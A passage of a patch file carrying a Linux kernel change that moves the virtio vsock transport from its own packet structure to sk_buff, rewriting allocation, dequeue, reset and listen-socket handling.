+ 
+-	pkt->hdr.type		= cpu_to_le16(info->type);
+-	pkt->hdr.op		= cpu_to_le16(info->op);
+-	pkt->hdr.src_cid	= cpu_to_le64(src_cid);
+-	pkt->hdr.dst_cid	= cpu_to_le64(dst_cid);
+-	pkt->hdr.src_port	= cpu_to_le32(src_port);
+-	pkt->hdr.dst_port	= cpu_to_le32(dst_port);
+-	pkt->hdr.flags		= cpu_to_le32(info->flags);
+-	pkt->len		= len;
+-	pkt->hdr.len		= cpu_to_le32(len);
+-	pkt->reply		= info->reply;
+-	pkt->vsk		= info->vsk;
++	hdr = virtio_vsock_hdr(skb);
++	hdr->type	= cpu_to_le16(info->type);
++	hdr->op		= cpu_to_le16(info->op);
++	hdr->src_cid	= cpu_to_le64(src_cid);
++	hdr->dst_cid	= cpu_to_le64(dst_cid);
++	hdr->src_port	= cpu_to_le32(src_port);
++	hdr->dst_port	= cpu_to_le32(dst_port);
++	hdr->flags	= cpu_to_le32(info->flags);
++	hdr->len	= cpu_to_le32(len);
++	hdr->buf_alloc	= cpu_to_le32(0);
++	hdr->fwd_cnt	= cpu_to_le32(0);
+ 
+ 	if (info->msg && len > 0) {
+-		pkt->buf = kmalloc(len, GFP_KERNEL);
+-		if (!pkt->buf)
+-			goto out_pkt;
+-
+-		pkt->buf_len = len;
+-
+-		err = memcpy_from_msg(pkt->buf, info->msg, len);
++		payload = skb_put(skb, len);
++		err = memcpy_from_msg(payload, info->msg, len);
+ 		if (err)
+ 			goto out;
+ 
+ 		if (msg_data_left(info->msg) == 0 &&
+ 		    info->type == VIRTIO_VSOCK_TYPE_SEQPACKET) {
+-			pkt->hdr.flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
++			hdr->flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
+ 
+ 			if (info->msg->msg_flags & MSG_EOR)
+-				pkt->hdr.flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
++				hdr->flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
+ 		}
+ 	}
+ 
++	if (info->reply)
++		virtio_vsock_skb_set_reply(skb);
++
+ 	trace_virtio_transport_alloc_pkt(src_cid, src_port,
+ 					 dst_cid, dst_port,
+ 					 len,
+@@ -91,19 +96,23 @@ virtio_transport_alloc_pkt(struct virtio_vsock_pkt_info *info,
+ 					 info->op,
+ 					 info->flags);
+ 
+-	return pkt;
++	if (info->vsk && !skb_set_owner_sk_safe(skb, sk_vsock(info->vsk))) {
++		WARN_ONCE(1, "failed to allocate skb on vsock socket with sk_refcnt == 0\n");
++		goto out;
++	}
++
++	return skb;
+ 
+ out:
+-	kfree(pkt->buf);
+-out_pkt:
+-	kfree(pkt);
++	kfree_skb(skb);
+ 	return NULL;
+ }
+ 
+ /* Packet capture */
+ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ {
+-	struct virtio_vsock_pkt *pkt = opaque;
++	struct virtio_vsock_hdr *pkt_hdr;
++	struct sk_buff *pkt = opaque;
+ 	struct af_vsockmon_hdr *hdr;
+ 	struct sk_buff *skb;
+ 	size_t payload_len;
+@@ -113,10 +122,11 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 	 * the payload length from the header and the buffer pointer taking
+ 	 * care of the offset in the original packet.
+ 	 */
+-	payload_len = le32_to_cpu(pkt->hdr.len);
+-	payload_buf = pkt->buf + pkt->off;
++	pkt_hdr = virtio_vsock_hdr(pkt);
++	payload_len = pkt->len;
++	payload_buf = pkt->data;
+ 
+-	skb = alloc_skb(sizeof(*hdr) + sizeof(pkt->hdr) + payload_len,
++	skb = alloc_skb(sizeof(*hdr) + sizeof(*pkt_hdr) + payload_len,
+ 			GFP_ATOMIC);
+ 	if (!skb)
+ 		return NULL;
+@@ -124,16 +134,16 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 	hdr = skb_put(skb, sizeof(*hdr));
+ 
+ 	/* pkt->hdr is little-endian so no need to byteswap here */
+-	hdr->src_cid = pkt->hdr.src_cid;
+-	hdr->src_port = pkt->hdr.src_port;
+-	hdr->dst_cid = pkt->hdr.dst_cid;
+-	hdr->dst_port = pkt->hdr.dst_port;
++	hdr->src_cid = pkt_hdr->src_cid;
++	hdr->src_port = pkt_hdr->src_port;
++	hdr->dst_cid = pkt_hdr->dst_cid;
++	hdr->dst_port = pkt_hdr->dst_port;
+ 
+ 	hdr->transport = cpu_to_le16(AF_VSOCK_TRANSPORT_VIRTIO);
+-	hdr->len = cpu_to_le16(sizeof(pkt->hdr));
++	hdr->len = cpu_to_le16(sizeof(*pkt_hdr));
+ 	memset(hdr->reserved, 0, sizeof(hdr->reserved));
+ 
+-	switch (le16_to_cpu(pkt->hdr.op)) {
++	switch (le16_to_cpu(pkt_hdr->op)) {
+ 	case VIRTIO_VSOCK_OP_REQUEST:
+ 	case VIRTIO_VSOCK_OP_RESPONSE:
+ 		hdr->op = cpu_to_le16(AF_VSOCK_OP_CONNECT);
+@@ -154,7 +164,7 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 		break;
+ 	}
+ 
+-	skb_put_data(skb, &pkt->hdr, sizeof(pkt->hdr));
++	skb_put_data(skb, pkt_hdr, sizeof(*pkt_hdr));
+ 
+ 	if (payload_len) {
+ 		skb_put_data(skb, payload_buf, payload_len);
+@@ -163,13 +173,13 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 	return skb;
+ }
+ 
+-void virtio_transport_deliver_tap_pkt(struct virtio_vsock_pkt *pkt)
++void virtio_transport_deliver_tap_pkt(struct sk_buff *skb)
+ {
+-	if (pkt->tap_delivered)
++	if (virtio_vsock_skb_tap_delivered(skb))
+ 		return;
+ 
+-	vsock_deliver_tap(virtio_transport_build_skb, pkt);
+-	pkt->tap_delivered = true;
++	vsock_deliver_tap(virtio_transport_build_skb, skb);
++	virtio_vsock_skb_set_tap_delivered(skb);
+ }
+ EXPORT_SYMBOL_GPL(virtio_transport_deliver_tap_pkt);
+ 
+@@ -192,8 +202,8 @@ static int virtio_transport_send_pkt_info(struct vsock_sock *vsk,
+ 	u32 src_cid, src_port, dst_cid, dst_port;
+ 	const struct virtio_transport *t_ops;
+ 	struct virtio_vsock_sock *vvs;
+-	struct virtio_vsock_pkt *pkt;
+ 	u32 pkt_len = info->pkt_len;
++	struct sk_buff *skb;
+ 
+ 	info->type = virtio_transport_get_type(sk_vsock(vsk));
+ 
+@@ -224,42 +234,44 @@ static int virtio_transport_send_pkt_info(struct vsock_sock *vsk,
+ 	if (pkt_len == 0 && info->op == VIRTIO_VSOCK_OP_RW)
+ 		return pkt_len;
+ 
+-	pkt = virtio_transport_alloc_pkt(info, pkt_len,
++	skb = virtio_transport_alloc_skb(info, pkt_len,
+ 					 src_cid, src_port,
+ 					 dst_cid, dst_port);
+-	if (!pkt) {
++	if (!skb) {
+ 		virtio_transport_put_credit(vvs, pkt_len);
+ 		return -ENOMEM;
+ 	}
+ 
+-	virtio_transport_inc_tx_pkt(vvs, pkt);
++	virtio_transport_inc_tx_pkt(vvs, skb);
+ 
+-	return t_ops->send_pkt(pkt);
++	return t_ops->send_pkt(skb);
+ }
+ 
+ static bool virtio_transport_inc_rx_pkt(struct virtio_vsock_sock *vvs,
+-					struct virtio_vsock_pkt *pkt)
++					u32 len)
+ {
+-	if (vvs->rx_bytes + pkt->len > vvs->buf_alloc)
++	if (vvs->rx_bytes + len > vvs->buf_alloc)
+ 		return false;
+ 
+-	vvs->rx_bytes += pkt->len;
++	vvs->rx_bytes += len;
+ 	return true;
+ }
+ 
+ static void virtio_transport_dec_rx_pkt(struct virtio_vsock_sock *vvs,
+-					struct virtio_vsock_pkt *pkt)
++					u32 len)
+ {
+-	vvs->rx_bytes -= pkt->len;
+-	vvs->fwd_cnt += pkt->len;
++	vvs->rx_bytes -= len;
++	vvs->fwd_cnt += len;
+ }
+ 
+-void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct virtio_vsock_pkt *pkt)
++void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
++
+ 	spin_lock_bh(&vvs->rx_lock);
+ 	vvs->last_fwd_cnt = vvs->fwd_cnt;
+-	pkt->hdr.fwd_cnt = cpu_to_le32(vvs->fwd_cnt);
+-	pkt->hdr.buf_alloc = cpu_to_le32(vvs->buf_alloc);
++	hdr->fwd_cnt = cpu_to_le32(vvs->fwd_cnt);
++	hdr->buf_alloc = cpu_to_le32(vvs->buf_alloc);
+ 	spin_unlock_bh(&vvs->rx_lock);
+ }
+ EXPORT_SYMBOL_GPL(virtio_transport_inc_tx_pkt);
+@@ -303,29 +315,29 @@ virtio_transport_stream_do_peek(struct vsock_sock *vsk,
+ 				size_t len)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt;
+ 	size_t bytes, total = 0, off;
++	struct sk_buff *skb, *tmp;
+ 	int err = -EFAULT;
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+ 
+-	list_for_each_entry(pkt, &vvs->rx_queue, list) {
+-		off = pkt->off;
++	skb_queue_walk_safe(&vvs->rx_queue, skb,  tmp) {
++		off = 0;
+ 
+ 		if (total == len)
+ 			break;
+ 
+-		while (total < len && off < pkt->len) {
++		while (total < len && off < skb->len) {
+ 			bytes = len - total;
+-			if (bytes > pkt->len - off)
+-				bytes = pkt->len - off;
++			if (bytes > skb->len - off)
++				bytes = skb->len - off;
+ 
+ 			/* sk_lock is held by caller so no one else can dequeue.
+ 			 * Unlock rx_lock since memcpy_to_msg() may sleep.
+ 			 */
+ 			spin_unlock_bh(&vvs->rx_lock);
+ 
+-			err = memcpy_to_msg(msg, pkt->buf + off, bytes);
++			err = memcpy_to_msg(msg, skb->data + off, bytes);
+ 			if (err)
+ 				goto out;
+ 
+@@ -352,37 +364,39 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 				   size_t len)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt;
+ 	size_t bytes, total = 0;
+-	u32 free_space;
++	struct sk_buff *skb;
+ 	int err = -EFAULT;
++	u32 free_space;
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+-	while (total < len && !list_empty(&vvs->rx_queue)) {
+-		pkt = list_first_entry(&vvs->rx_queue,
+-				       struct virtio_vsock_pkt, list);
++	while (total < len && !skb_queue_empty(&vvs->rx_queue)) {
++		skb = skb_peek(&vvs->rx_queue);
+ 
+ 		bytes = len - total;
+-		if (bytes > pkt->len - pkt->off)
+-			bytes = pkt->len - pkt->off;
++		if (bytes > skb->len)
++			bytes = skb->len;
+ 
+ 		/* sk_lock is held by caller so no one else can dequeue.
+ 		 * Unlock rx_lock since memcpy_to_msg() may sleep.
+ 		 */
+ 		spin_unlock_bh(&vvs->rx_lock);
+ 
+-		err = memcpy_to_msg(msg, pkt->buf + pkt->off, bytes);
++		err = memcpy_to_msg(msg, skb->data, bytes);
+ 		if (err)
+ 			goto out;
+ 
+ 		spin_lock_bh(&vvs->rx_lock);
+ 
+ 		total += bytes;
+-		pkt->off += bytes;
+-		if (pkt->off == pkt->len) {
+-			virtio_transport_dec_rx_pkt(vvs, pkt);
+-			list_del(&pkt->list);
+-			virtio_transport_free_pkt(pkt);
++		skb_pull(skb, bytes);
++
++		if (skb->len == 0) {
++			u32 pkt_len = le32_to_cpu(virtio_vsock_hdr(skb)->len);
++
++			virtio_transport_dec_rx_pkt(vvs, pkt_len);
++			__skb_unlink(skb, &vvs->rx_queue);
++			consume_skb(skb);
+ 		}
+ 	}
+ 
+@@ -414,10 +428,10 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 						 int flags)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt;
+ 	int dequeued_len = 0;
+ 	size_t user_buf_len = msg_data_left(msg);
+ 	bool msg_ready = false;
++	struct sk_buff *skb;
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+ 
+@@ -427,13 +441,18 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 	}
+ 
+ 	while (!msg_ready) {
+-		pkt = list_first_entry(&vvs->rx_queue, struct virtio_vsock_pkt, list);
++		struct virtio_vsock_hdr *hdr;
++		size_t pkt_len;
++
++		skb = __skb_dequeue(&vvs->rx_queue);
++		if (!skb)
++			break;
++		hdr = virtio_vsock_hdr(skb);
++		pkt_len = (size_t)le32_to_cpu(hdr->len);
+ 
+ 		if (dequeued_len >= 0) {
+-			size_t pkt_len;
+ 			size_t bytes_to_copy;
+ 
+-			pkt_len = (size_t)le32_to_cpu(pkt->hdr.len);
+ 			bytes_to_copy = min(user_buf_len, pkt_len);
+ 
+ 			if (bytes_to_copy) {
+@@ -444,7 +463,7 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 				 */
+ 				spin_unlock_bh(&vvs->rx_lock);
+ 
+-				err = memcpy_to_msg(msg, pkt->buf, bytes_to_copy);
++				err = memcpy_to_msg(msg, skb->data, bytes_to_copy);
+ 				if (err) {
+ 					/* Copy of message failed. Rest of
+ 					 * fragments will be freed without copy.
+@@ -461,17 +480,16 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 				dequeued_len += pkt_len;
+ 		}
+ 
+-		if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM) {
++		if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOM) {
+ 			msg_ready = true;
+ 			vvs->msg_count--;
+ 
+-			if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOR)
++			if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOR)
+ 				msg->msg_flags |= MSG_EOR;
+ 		}
+ 
+-		virtio_transport_dec_rx_pkt(vvs, pkt);
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_dec_rx_pkt(vvs, pkt_len);
++		kfree_skb(skb);
+ 	}
+ 
+ 	spin_unlock_bh(&vvs->rx_lock);
+@@ -609,7 +627,7 @@ int virtio_transport_do_socket_init(struct vsock_sock *vsk,
+ 
+ 	spin_lock_init(&vvs->rx_lock);
+ 	spin_lock_init(&vvs->tx_lock);
+-	INIT_LIST_HEAD(&vvs->rx_queue);
++	skb_queue_head_init(&vvs->rx_queue);
+ 
+ 	return 0;
+ }
+@@ -806,16 +824,16 @@ void virtio_transport_destruct(struct vsock_sock *vsk)
+ EXPORT_SYMBOL_GPL(virtio_transport_destruct);
+ 
+ static int virtio_transport_reset(struct vsock_sock *vsk,
+-				  struct virtio_vsock_pkt *pkt)
++				  struct sk_buff *skb)
+ {
+ 	struct virtio_vsock_pkt_info info = {
+ 		.op = VIRTIO_VSOCK_OP_RST,
+-		.reply = !!pkt,
++		.reply = !!skb,
+ 		.vsk = vsk,
+ 	};
+ 
+ 	/* Send RST only if the original pkt is not a RST pkt */
+-	if (pkt && le16_to_cpu(pkt->hdr.op) == VIRTIO_VSOCK_OP_RST)
++	if (skb && le16_to_cpu(virtio_vsock_hdr(skb)->op) == VIRTIO_VSOCK_OP_RST)
+ 		return 0;
+ 
+ 	return virtio_transport_send_pkt_info(vsk, &info);
+@@ -825,29 +843,30 @@ static int virtio_transport_reset(struct vsock_sock *vsk,
+  * attempt was made to connect to a socket that does not exist.
+  */
+ static int virtio_transport_reset_no_sock(const struct virtio_transport *t,
+-					  struct virtio_vsock_pkt *pkt)
++					  struct sk_buff *skb)
+ {
+-	struct virtio_vsock_pkt *reply;
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct virtio_vsock_pkt_info info = {
+ 		.op = VIRTIO_VSOCK_OP_RST,
+-		.type = le16_to_cpu(pkt->hdr.type),
++		.type = le16_to_cpu(hdr->type),
+ 		.reply = true,
+ 	};
++	struct sk_buff *reply;
+ 
+ 	/* Send RST only if the original pkt is not a RST pkt */
+-	if (le16_to_cpu(pkt->hdr.op) == VIRTIO_VSOCK_OP_RST)
++	if (le16_to_cpu(hdr->op) == VIRTIO_VSOCK_OP_RST)
+ 		return 0;
+ 
+-	reply = virtio_transport_alloc_pkt(&info, 0,
+-					   le64_to_cpu(pkt->hdr.dst_cid),
+-					   le32_to_cpu(pkt->hdr.dst_port),
+-					   le64_to_cpu(pkt->hdr.src_cid),
+-					   le32_to_cpu(pkt->hdr.src_port));
++	reply = virtio_transport_alloc_skb(&info, 0,
++					   le64_to_cpu(hdr->dst_cid),
++					   le32_to_cpu(hdr->dst_port),
++					   le64_to_cpu(hdr->src_cid),
++					   le32_to_cpu(hdr->src_port));
+ 	if (!reply)
+ 		return -ENOMEM;
+ 
+ 	if (!t) {
+-		virtio_transport_free_pkt(reply);
++		kfree_skb(reply);
+ 		return -ENOTCONN;
+ 	}
+ 
+@@ -858,16 +877,11 @@ static int virtio_transport_reset_no_sock(const struct virtio_transport *t,
+ static void virtio_transport_remove_sock(struct vsock_sock *vsk)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt, *tmp;
+ 
+ 	/* We don't need to take rx_lock, as the socket is closing and we are
+ 	 * removing it.
+ 	 */
+-	list_for_each_entry_safe(pkt, tmp, &vvs->rx_queue, list) {
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-
++	__skb_queue_purge(&vvs->rx_queue);
+ 	vsock_remove_sock(vsk);
+ }
+ 
+@@ -981,13 +995,14 @@ EXPORT_SYMBOL_GPL(virtio_transport_release);
+ 
+ static int
+ virtio_transport_recv_connecting(struct sock *sk,
+-				 struct virtio_vsock_pkt *pkt)
++				 struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+-	int err;
+ 	int skerr;
++	int err;
+ 
+-	switch (le16_to_cpu(pkt->hdr.op)) {
++	switch (le16_to_cpu(hdr->op)) {
+ 	case VIRTIO_VSOCK_OP_RESPONSE:
+ 		sk->sk_state = TCP_ESTABLISHED;
+ 		sk->sk_socket->state = SS_CONNECTED;
+@@ -1008,7 +1023,7 @@ virtio_transport_recv_connecting(struct sock *sk,
+ 	return 0;
+ 
+ destroy:
+-	virtio_transport_reset(vsk, pkt);
++	virtio_transport_reset(vsk, skb);
+ 	sk->sk_state = TCP_CLOSE;
+ 	sk->sk_err = skerr;
+ 	sk_error_report(sk);
+@@ -1017,34 +1032,37 @@ destroy:
+ 
+ static void
+ virtio_transport_recv_enqueue(struct vsock_sock *vsk,
+-			      struct virtio_vsock_pkt *pkt)
++			      struct sk_buff *skb)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	bool can_enqueue, free_pkt = false;
++	struct virtio_vsock_hdr *hdr;
++	u32 len;
+ 
+-	pkt->len = le32_to_cpu(pkt->hdr.len);
+-	pkt->off = 0;
++	hdr = virtio_vsock_hdr(skb);
++	len = le32_to_cpu(hdr->len);
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+ 
+-	can_enqueue = virtio_transport_inc_rx_pkt(vvs, pkt);
++	can_enqueue = virtio_transport_inc_rx_pkt(vvs, len);
+ 	if (!can_enqueue) {
+ 		free_pkt = true;
+ 		goto out;
+ 	}
+ 
+-	if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM)
++	if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOM)
+ 		vvs->msg_count++;
+ 
+ 	/* Try to copy small packets into the buffer of last packet queued,
+ 	 * to avoid wasting memory queueing the entire buffer with a small
+ 	 * payload.
+ 	 */
+-	if (pkt->len <= GOOD_COPY_LEN && !list_empty(&vvs->rx_queue)) {
+-		struct virtio_vsock_pkt *last_pkt;
++	if (len <= GOOD_COPY_LEN && !skb_queue_empty(&vvs->rx_queue)) {
++		struct virtio_vsock_hdr *last_hdr;
++		struct sk_buff *last_skb;
+ 
+-		last_pkt = list_last_entry(&vvs->rx_queue,
+-					   struct virtio_vsock_pkt, list);
++		last_skb = skb_peek_tail(&vvs->rx_queue);
++		last_hdr = virtio_vsock_hdr(last_skb);
+ 
+ 		/* If there is space in the last packet queued, we copy the
+ 		 * new packet in its buffer. We avoid this if the last packet
+@@ -1052,35 +1070,35 @@ virtio_transport_recv_enqueue(struct vsock_sock *vsk,
+ 		 * delimiter of SEQPACKET message, so 'pkt' is the first packet
+ 		 * of a new message.
+ 		 */
+-		if ((pkt->len <= last_pkt->buf_len - last_pkt->len) &&
+-		    !(le32_to_cpu(last_pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM)) {
+-			memcpy(last_pkt->buf + last_pkt->len, pkt->buf,
+-			       pkt->len);
+-			last_pkt->len += pkt->len;
++		if (skb->len < skb_tailroom(last_skb) &&
++		    !(le32_to_cpu(last_hdr->flags) & VIRTIO_VSOCK_SEQ_EOM)) {
++			memcpy(skb_put(last_skb, skb->len), skb->data, skb->len);
+ 			free_pkt = true;
+-			last_pkt->hdr.flags |= pkt->hdr.flags;
++			last_hdr->flags |= hdr->flags;
++			le32_add_cpu(&last_hdr->len, len);
+ 			goto out;
+ 		}
+ 	}
+ 
+-	list_add_tail(&pkt->list, &vvs->rx_queue);
++	__skb_queue_tail(&vvs->rx_queue, skb);
+ 
+ out:
+ 	spin_unlock_bh(&vvs->rx_lock);
+ 	if (free_pkt)
+-		virtio_transport_free_pkt(pkt);
++		kfree_skb(skb);
+ }
+ 
+ static int
+ virtio_transport_recv_connected(struct sock *sk,
+-				struct virtio_vsock_pkt *pkt)
++				struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 	int err = 0;
+ 
+-	switch (le16_to_cpu(pkt->hdr.op)) {
++	switch (le16_to_cpu(hdr->op)) {
+ 	case VIRTIO_VSOCK_OP_RW:
+-		virtio_transport_recv_enqueue(vsk, pkt);
++		virtio_transport_recv_enqueue(vsk, skb);
+ 		vsock_data_ready(sk);
+ 		return err;
+ 	case VIRTIO_VSOCK_OP_CREDIT_REQUEST:
+@@ -1090,18 +1108,23 @@ virtio_transport_recv_connected(struct sock *sk,
+ 		sk->sk_write_space(sk);
+ 		break;
+ 	case VIRTIO_VSOCK_OP_SHUTDOWN:
+-		if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SHUTDOWN_RCV)
++		if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SHUTDOWN_RCV)
+ 			vsk->peer_shutdown |= RCV_SHUTDOWN;
+-		if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SHUTDOWN_SEND)
++		if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SHUTDOWN_SEND)
+ 			vsk->peer_shutdown |= SEND_SHUTDOWN;
+-		if (vsk->peer_shutdown == SHUTDOWN_MASK &&
+-		    vsock_stream_has_data(vsk) <= 0 &&
+-		    !sock_flag(sk, SOCK_DONE)) {
+-			(void)virtio_transport_reset(vsk, NULL);
+-
+-			virtio_transport_do_close(vsk, true);
++		if (vsk->peer_shutdown == SHUTDOWN_MASK) {
++			if (vsock_stream_has_data(vsk) <= 0 && !sock_flag(sk, SOCK_DONE)) {
++				(void)virtio_transport_reset(vsk, NULL);
++				virtio_transport_do_close(vsk, true);
++			}
++			/* Remove this socket anyway because the remote peer sent
++			 * the shutdown. This way a new connection will succeed
++			 * if the remote peer uses the same source port,
++			 * even if the old socket is still unreleased, but now disconnected.
++			 */
++			vsock_remove_sock(vsk);
+ 		}
+-		if (le32_to_cpu(pkt->hdr.flags))
++		if (le32_to_cpu(virtio_vsock_hdr(skb)->flags))
+ 			sk->sk_state_change(sk);
+ 		break;
+ 	case VIRTIO_VSOCK_OP_RST:
+@@ -1112,28 +1135,30 @@ virtio_transport_recv_connected(struct sock *sk,
+ 		break;
+ 	}
+ 
+-	virtio_transport_free_pkt(pkt);
++	kfree_skb(skb);
+ 	return err;
+ }
+ 
+ static void
+ virtio_transport_recv_disconnecting(struct sock *sk,
+-				    struct virtio_vsock_pkt *pkt)
++				    struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 
+-	if (le16_to_cpu(pkt->hdr.op) == VIRTIO_VSOCK_OP_RST)
++	if (le16_to_cpu(hdr->op) == VIRTIO_VSOCK_OP_RST)
+ 		virtio_transport_do_close(vsk, true);
+ }
+ 
+ static int
+ virtio_transport_send_response(struct vsock_sock *vsk,
+-			       struct virtio_vsock_pkt *pkt)
++			       struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct virtio_vsock_pkt_info info = {
+ 		.op = VIRTIO_VSOCK_OP_RESPONSE,
+-		.remote_cid = le64_to_cpu(pkt->hdr.src_cid),
+-		.remote_port = le32_to_cpu(pkt->hdr.src_port),
++		.remote_cid = le64_to_cpu(hdr->src_cid),
++		.remote_port = le32_to_cpu(hdr->src_port),
+ 		.reply = true,
+ 		.vsk = vsk,
+ 	};
+@@ -1142,8 +1167,9 @@ virtio_transport_send_response(struct vsock_sock *vsk,
+ }
+ 
+ static bool virtio_transport_space_update(struct sock *sk,
+-					  struct virtio_vsock_pkt *pkt)
++					  struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	bool space_available;
+@@ -1158,8 +1184,8 @@ static bool virtio_transport_space_update(struct sock *sk,
+ 
+ 	/* buf_alloc and fwd_cnt is always included in the hdr */
+ 	spin_lock_bh(&vvs->tx_lock);
+-	vvs->peer_buf_alloc = le32_to_cpu(pkt->hdr.buf_alloc);
+-	vvs->peer_fwd_cnt = le32_to_cpu(pkt->hdr.fwd_cnt);
++	vvs->peer_buf_alloc = le32_to_cpu(hdr->buf_alloc);
++	vvs->peer_fwd_cnt = le32_to_cpu(hdr->fwd_cnt);
+ 	space_available = virtio_transport_has_space(vsk);
+ 	spin_unlock_bh(&vvs->tx_lock);
+ 	return space_available;
+@@ -1167,27 +1193,28 @@ static bool virtio_transport_space_update(struct sock *sk,
+ 
+ /* Handle server socket */
+ static int
+-virtio_transport_recv_listen(struct sock *sk, struct virtio_vsock_pkt *pkt,
++virtio_transport_recv_listen(struct sock *sk, struct sk_buff *skb,
+ 			     struct virtio_transport *t)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 	struct vsock_sock *vchild;
+ 	struct sock *child;
+ 	int ret;
+ 
+-	if (le16_to_cpu(pkt->hdr.op) != VIRTIO_VSOCK_OP_REQUEST) {
+-		virtio_transport_reset_no_sock(t, pkt);
++	if (le16_to_cpu(hdr->op) != VIRTIO_VSOCK_OP_REQUEST) {
++		virtio_transport_reset_no_sock(t, skb);
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (sk_acceptq_is_full(sk)) {
+-		virtio_transport_reset_no_sock(t, pkt);
++		virtio_transport_reset_no_sock(t, skb);
+ 		return -ENOMEM;
+ 	}
+ 
+ 	child = vsock_create_connected(sk);
+ 	if (!child) {
+-		virtio_transport_reset_no_sock(t, pkt);
++		virtio_transport_reset_no_sock(t, skb);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -1198,10 +1225,10 @@ virtio_transport_recv_listen(struct sock *sk, struct virtio_vsock_pkt *pkt,
+ 	child->sk_state = TCP_ESTABLISHED;
+ 
+ 	vchild = vsock_sk(child);
+-	vsock_addr_init(&vchild->local_addr, le64_to_cpu(pkt->hdr.dst_cid),
+-			le32_to_cpu(pkt->hdr.dst_port));
+-	vsock_addr_init(&vchild->remote_addr, le64_to_cpu(pkt->hdr.src_cid),
+-			le32_to_cpu(pkt->hdr.src_port));
++	vsock_addr_init(&vchild->local_addr, le64_to_cpu(hdr->dst_cid),
++			le32_to_cpu(hdr->dst_port));
++	vsock_addr_init(&vchild->remote_addr, le64_to_cpu(hdr->src_cid),
++			le32_to_cpu(hdr->src_port));
+ 
+ 	ret = vsock_assign_transport(vchild, vsk);
+ 	/* Transport assigned (looking at remote_addr) must be the same
+@@ -1209,17 +1236,17 @@ virtio_transport_recv_listen(struct sock *sk, struct virtio_vsock_pkt *pkt,
+ 	 */
+ 	if (ret || vchild->transport != &t->transport) {
+ 		release_sock(child);
+-		virtio_transport_reset_no_sock(t, pkt);
++		virtio_transport_reset_no_sock(t, skb);
+ 		sock_put(child);
+ 		return ret;
+ 	}
+ 
+-	if (virtio_transport_space_update(child, pkt))
++	if (virtio_transport_space_update(child, skb))
+ 		child->sk_write_space(child);
+ 
+ 	vsock_insert_connected(vchild);
+ 	vsock_enqueue_accept(sk, child);
+-	virtio_transport_send_response(vchild, pkt);
++	virtio_transport_send_response(vchild, skb);
+ 
+ 	release_sock(child);
+ 
+@@ -1237,29 +1264,30 @@ static bool virtio_transport_valid_type(u16 type)
+  * lock.
+  */
+ void virtio_transport_recv_pkt(struct virtio_transport *t,
+-			       struct virtio_vsock_pkt *pkt)
++			       struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct sockaddr_vm src, dst;
+ 	struct vsock_sock *vsk;
+ 	struct sock *sk;
+ 	bool space_available;
+ 
